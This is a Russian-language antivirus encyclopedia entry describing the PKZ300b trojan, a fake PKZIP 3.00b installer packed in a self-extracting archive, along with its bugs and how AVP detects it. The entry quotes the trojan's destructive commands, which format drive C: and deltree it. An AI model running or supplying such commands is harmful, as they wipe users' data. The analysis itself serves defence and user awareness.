Энциклопедия компьютерных вирусов

         

PKZ300b


Представляет из себя self-extracting (Zip2Exe) архив с именем PKZ300B.EXE и длиной 178981 байт. Внутри архива - 5 файлов:

имя файла длина что внутри --------- ----- ---------- PKZINST.EXE 5328 сам троянец WHATSNEW.300 2417 WhatsNew из PkZip 2.04c, все строки "2.04c" заменены на "3.0" COMPRESS.000 124005 ARJ 2.41, плюс экстра-данные COMPRESS.001 116260 ARJ 2.41 сам по себе FILE_ID.DIZ 101 DOC-файл, говорит про этот архив, что он - Pkzip 3.00b.

Троянцем является единственный файл - PKZINST.EXE. Hаписан он на TurboPascal. При запуске выводит текст:

PKZIP (R) Install Utility Version 3.00b 4-05-950 Copr. 1989-1995 Pkware Inc. All Rights Reserved. Pkzip Reg. U.S. Pat. and Tm. Off.

Initializing, this may take a few minutes....

и выполняет две команды:

COMMAND.COM /C Format c: > NULL COMMAND.COM /C deltree /y c:\ > NULL

К счастью, автору троянца не хватило ума сделать троянца без ошибок, и троянец затыкается на первой же команде - DOS ждет ответа на стандартный запрос:

WARNING: ALL DATA ON NON-REMOVABLE DISK DRIVE C: WILL BE LOST! Proceed with Format (Y/N)?

Причем самого этого запроса на экране не видно. Hе дай бог, конечно же, нажать "Y" или "N". Если "Y", то пойдет формат диска C:, если "N", то пойдет работать DELTREE. Однако естественное желание при виде заснувшей программы - нажать Reset или Ctrl-C/Break. В обоих случаях троянец отрубается безо всякой потери данных, а если выход произошел по Ctrl-C, то он еще вякнет напоследок:

Thanks for waiting, moron. You shouldn't have fucked with us.

и вываливается в DOS. Так что, благодаря этой ошибке юзер может спать спокойно и не бояться новых версий PKZip. Плюс к тому: в троянце есть еже одна ошибка. Перенаправление "> NULL" создает на диске файл NULL, а автор троянца видимо, хотел отключить посторонний вывод на экран перенаправлением "> NUL". Судя по всему сие [юное] дарование читает DOS User's Guide и еще не дошло до буквы 'N' в алфавитном списке команд DOS. AVP ловит этого троянца под именем "Trojan.PKZ300b" как в распакованном файле, так и в self-extracting архиве.



Содержание раздела